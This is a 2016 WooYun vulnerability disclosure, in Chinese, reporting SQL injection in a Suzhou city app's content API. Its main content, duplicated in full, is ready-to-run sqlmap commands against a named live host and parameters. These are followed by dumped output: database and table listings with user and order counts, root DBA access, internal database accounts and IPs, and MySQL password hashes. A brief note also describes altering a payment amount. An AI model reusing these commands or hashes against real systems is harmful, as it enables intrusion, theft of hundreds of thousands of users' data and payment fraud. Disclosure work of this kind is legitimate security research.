当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208092

漏洞标题:苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

相关厂商:苏州世纪飞越网络信息有限公司

漏洞作者: 黑色键盘丶

提交时间:2016-05-13 12:16

修复时间:2016-05-18 12:20

公开时间:2016-05-18 12:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-13: 细节已通知厂商并且等待厂商处理中
2016-05-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?relatedOrder=7&platform
=2&deviceId=864690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&ve
rsion=3.9.2&comment=%F0%9F%98%811&type=1&uname=rknsja&relateId=470258" -p "relatedOrder" --dbs
---------------------------------------------------------------------------------
sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?platform=2&deviceId=864
690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&version=3.9.2&com
ment=111&type=1&uname=rknsja&relateId=470214" -p "relateId" --dbs


数据库信息

available databases [21]:
[*] bike
[*] information_schema
[*] mysql
[*] news_stat
[*] palau_core
[*] statistic
[*] sztv
[*] sztv_baoliaodb
[*] sztv_busdb
[*] sztv_coachdb
[*] sztv_mcenterdb
[*] sztv_newsdb
[*] sztv_paydb
[*] sztv_statdb
[*] sztv_subwaydb
[*] sztv_systemdb
[*] sztv_taxidb
[*] sztv_ucenterdb
[*] sztv_urecorddb
[*] sztv_weatherdb
[*] sztv_webdb


dba权限垮裤查询
83w用户信息+57w订单
Database: sztv_ucenterdb
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| `user` | 830469 |
| order_info | 574954 |
| credit_log | 395133 |
| user_currency | 364474 |
| currency_log | 364351 |
| credit | 257099 |
| login_log | 197593 |
| sms_user | 46552 |
| account_log | 19755 |
| user_account | 19700 |
| mobile | 6849 |
| smsverify_log | 2463 |
| refundorder | 927 |
| invitelog | 584 |
| event_2016050401_1 | 223 |
| blacklist | 176 |
| credit_rule | 7 |
| product_notice | 7 |
| user_addr | 2 |
| smsverify | 1 |
+--------------------+---------+


Database: sztv_paydb
+---------------+---------+
| Table | Entries |
+---------------+---------+
| action_order | 29872 |
| action_draw | 1901 |
| action_draw_1 | 1457 |
| `action` | 14 |
+---------------+---------+
Database: palau_core
+---------------+---------+
| Table | Entries |
+---------------+---------+
| user_passport | 788284 |
| user_profile | 787466 |
| user_secret | 787465 |
| application | 6 |
| client | 2 |
| client_app | 2 |
+---------------+---------+
Database: sztv_coachdb
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| `order` | 434727 |
| `user` | 138878 |
| email | 6674 |
| stat_email_deliver | 2661 |
| t | 21 |
+--------------------+---------+
Database: bike
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| pm25 | 53629405 |
| bike_statistics | 11931902 |
| vote_record | 2266953 |
| booklog | 275523 |
| car_price | 82911 |
| linestationinfo | 28996 |
| survey_addedoption | 20785 |
| busstationinfo | 20199 |
| bike_badwords | 20142 |
| bike_busstation | 19743 |
| survey_action | 19478 |
| survey_answers | 16275 |
| busstation | 8371 |
| xunbao_user | 3788 |
| bike_station_copy | 2552 |
| ct_log | 2389 |
| skin_icon | 1232 |
| bike_station | 1163 |
| linestation | 905 |
| vote_info | 789 |
| survey_option | 621 |
| bike_splashimg | 597 |
| bookiphone | 308 |
| gravity | 205 |
| survey_title | 162 |
| bike_linestation | 129 |
| ct_option | 128 |
| bike_trainstation | 125 |
| temp_apply | 115 |
| bike_mood | 102 |
| vote_candidate | 102 |
| skin_background | 80 |
| xunbao_temp | 51 |
| ct_page | 47 |
| ct_title | 46 |
| temp_apply1 | 46 |
| bookandroid | 40 |
| survey_page | 30 |
| survey_candidate | 24 |
| vote_information | 20 |
| temp_apply2 | 18 |
| book | 15 |
| bike_city | 13 |
| apps_recommend_copy | 12 |
| temp_dhsz12 | 12 |
| bike_stationnews | 11 |
| apps_recommend | 10 |
| survey_voteinfo | 9 |
| taxi_landmark | 9 |
| bookImg | 8 |
| bike_line | 4 |
| skin_program | 4 |
| survey_vote | 4 |
| survey_awardtimes | 3 |
| sztv_ad | 2 |
| bike_admin | 1 |
+---------------------+---------+


[02:37:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
[02:37:40] [INFO] testing if current user is DBA
[02:37:40] [INFO] fetching current user
[02:37:40] [INFO] resumed: root@%
current user is DBA: True
[02:37:40] [INFO] fetching database users
[02:37:40] [INFO] the SQL query used returns 282 ent
database management system users [22]:
[*] 'backup'@'192.168.50.50'
[*] 'bakdb'@'%'
[*] 'bakdb'@'192.168.50.89'
[*] 'bakup'@'192.168.50.89'
[*] 'chaxun'@'%'
[*] 'cloud'@'%'
[*] 'dbbak'@'192.168.50.89'
[*] 'dbbak'@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'jeecn'@'localhost'
[*] 'jiankongbao'@'60.195.252.106'
[*] 'jiankongbao'@'60.195.252.107'
[*] 'reader'@'%'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.50.177'
[*] 'root'@'192.168.50.20'
[*] 'root'@'192.168.50.40'
[*] 'root'@'192.168.50.60'
[*] 'root'@'192.168.50.74'
[*] 'root'@'localhost'
[*] 'txq'@'%'
eb application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] backup [1]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] bakdb [2]:
password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
password hash: *939C0EE8C109E2F942E2AE69B29016556BAF6819
[*] bakup [1]:
password hash: *A116AE5F665BF5F27292C069082E763E023D597B
[*] chaxun [1]:
password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
[*] cloud [1]:
password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
[*] dbbak [2]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
password hash: *F42C6D37F7F070D029EDED0C444C833B66147779
[*] debian-sys-maint [1]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] jeecn [1]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] jiankongbao [2]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
password hash: *FC69E042CE30D92E2952335F690CF2345C812E36
[*] reader [1]:
password hash: *ADAFC02D5BD8CD1DC3BD2D4EC546BE906B907471
[*] root [3]:
password hash: *09B8E1925D91B246C24321C967D2181F8CF86D82
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
password hash: *3ACC54E8541A9AE6E1381A5320E5244D3C01F474
[*] txq [1]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC


这里一个支付的不知道是不是

34.png


抓包

3.png


修改为0.1

111.jpg


34.png

漏洞证明:

sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?relatedOrder=7&platform
=2&deviceId=864690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&ve
rsion=3.9.2&comment=%F0%9F%98%811&type=1&uname=rknsja&relateId=470258" -p "relatedOrder" --dbs
---------------------------------------------------------------------------------
sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?platform=2&deviceId=864
690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&version=3.9.2&com
ment=111&type=1&uname=rknsja&relateId=470214" -p "relateId" --dbs


数据库信息

available databases [21]:
[*] bike
[*] information_schema
[*] mysql
[*] news_stat
[*] palau_core
[*] statistic
[*] sztv
[*] sztv_baoliaodb
[*] sztv_busdb
[*] sztv_coachdb
[*] sztv_mcenterdb
[*] sztv_newsdb
[*] sztv_paydb
[*] sztv_statdb
[*] sztv_subwaydb
[*] sztv_systemdb
[*] sztv_taxidb
[*] sztv_ucenterdb
[*] sztv_urecorddb
[*] sztv_weatherdb
[*] sztv_webdb


dba权限垮裤查询
83w用户信息+57w订单
Database: sztv_ucenterdb
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| `user` | 830469 |
| order_info | 574954 |
| credit_log | 395133 |
| user_currency | 364474 |
| currency_log | 364351 |
| credit | 257099 |
| login_log | 197593 |
| sms_user | 46552 |
| account_log | 19755 |
| user_account | 19700 |
| mobile | 6849 |
| smsverify_log | 2463 |
| refundorder | 927 |
| invitelog | 584 |
| event_2016050401_1 | 223 |
| blacklist | 176 |
| credit_rule | 7 |
| product_notice | 7 |
| user_addr | 2 |
| smsverify | 1 |
+--------------------+---------+


Database: sztv_paydb
+---------------+---------+
| Table | Entries |
+---------------+---------+
| action_order | 29872 |
| action_draw | 1901 |
| action_draw_1 | 1457 |
| `action` | 14 |
+---------------+---------+
Database: palau_core
+---------------+---------+
| Table | Entries |
+---------------+---------+
| user_passport | 788284 |
| user_profile | 787466 |
| user_secret | 787465 |
| application | 6 |
| client | 2 |
| client_app | 2 |
+---------------+---------+
Database: sztv_coachdb
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| `order` | 434727 |
| `user` | 138878 |
| email | 6674 |
| stat_email_deliver | 2661 |
| t | 21 |
+--------------------+---------+
Database: bike
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| pm25 | 53629405 |
| bike_statistics | 11931902 |
| vote_record | 2266953 |
| booklog | 275523 |
| car_price | 82911 |
| linestationinfo | 28996 |
| survey_addedoption | 20785 |
| busstationinfo | 20199 |
| bike_badwords | 20142 |
| bike_busstation | 19743 |
| survey_action | 19478 |
| survey_answers | 16275 |
| busstation | 8371 |
| xunbao_user | 3788 |
| bike_station_copy | 2552 |
| ct_log | 2389 |
| skin_icon | 1232 |
| bike_station | 1163 |
| linestation | 905 |
| vote_info | 789 |
| survey_option | 621 |
| bike_splashimg | 597 |
| bookiphone | 308 |
| gravity | 205 |
| survey_title | 162 |
| bike_linestation | 129 |
| ct_option | 128 |
| bike_trainstation | 125 |
| temp_apply | 115 |
| bike_mood | 102 |
| vote_candidate | 102 |
| skin_background | 80 |
| xunbao_temp | 51 |
| ct_page | 47 |
| ct_title | 46 |
| temp_apply1 | 46 |
| bookandroid | 40 |
| survey_page | 30 |
| survey_candidate | 24 |
| vote_information | 20 |
| temp_apply2 | 18 |
| book | 15 |
| bike_city | 13 |
| apps_recommend_copy | 12 |
| temp_dhsz12 | 12 |
| bike_stationnews | 11 |
| apps_recommend | 10 |
| survey_voteinfo | 9 |
| taxi_landmark | 9 |
| bookImg | 8 |
| bike_line | 4 |
| skin_program | 4 |
| survey_vote | 4 |
| survey_awardtimes | 3 |
| sztv_ad | 2 |
| bike_admin | 1 |
+---------------------+---------+


[02:37:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
[02:37:40] [INFO] testing if current user is DBA
[02:37:40] [INFO] fetching current user
[02:37:40] [INFO] resumed: root@%
current user is DBA: True
[02:37:40] [INFO] fetching database users
[02:37:40] [INFO] the SQL query used returns 282 ent
database management system users [22]:
[*] 'backup'@'192.168.50.50'
[*] 'bakdb'@'%'
[*] 'bakdb'@'192.168.50.89'
[*] 'bakup'@'192.168.50.89'
[*] 'chaxun'@'%'
[*] 'cloud'@'%'
[*] 'dbbak'@'192.168.50.89'
[*] 'dbbak'@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'jeecn'@'localhost'
[*] 'jiankongbao'@'60.195.252.106'
[*] 'jiankongbao'@'60.195.252.107'
[*] 'reader'@'%'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.50.177'
[*] 'root'@'192.168.50.20'
[*] 'root'@'192.168.50.40'
[*] 'root'@'192.168.50.60'
[*] 'root'@'192.168.50.74'
[*] 'root'@'localhost'
[*] 'txq'@'%'
eb application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] backup [1]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] bakdb [2]:
password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
password hash: *939C0EE8C109E2F942E2AE69B29016556BAF6819
[*] bakup [1]:
password hash: *A116AE5F665BF5F27292C069082E763E023D597B
[*] chaxun [1]:
password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
[*] cloud [1]:
password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
[*] dbbak [2]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
password hash: *F42C6D37F7F070D029EDED0C444C833B66147779
[*] debian-sys-maint [1]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] jeecn [1]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] jiankongbao [2]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
password hash: *FC69E042CE30D92E2952335F690CF2345C812E36
[*] reader [1]:
password hash: *ADAFC02D5BD8CD1DC3BD2D4EC546BE906B907471
[*] root [3]:
password hash: *09B8E1925D91B246C24321C967D2181F8CF86D82
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
password hash: *3ACC54E8541A9AE6E1381A5320E5244D3C01F474
[*] txq [1]:
password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC


这里一个支付的不知道是不是

34.png


抓包

3.png


修改为0.1

111.jpg


34.png

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-18 12:20

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-13 12:24 | Mazing ( 路人 | Rank:27 漏洞数:6 )

    键盘表哥666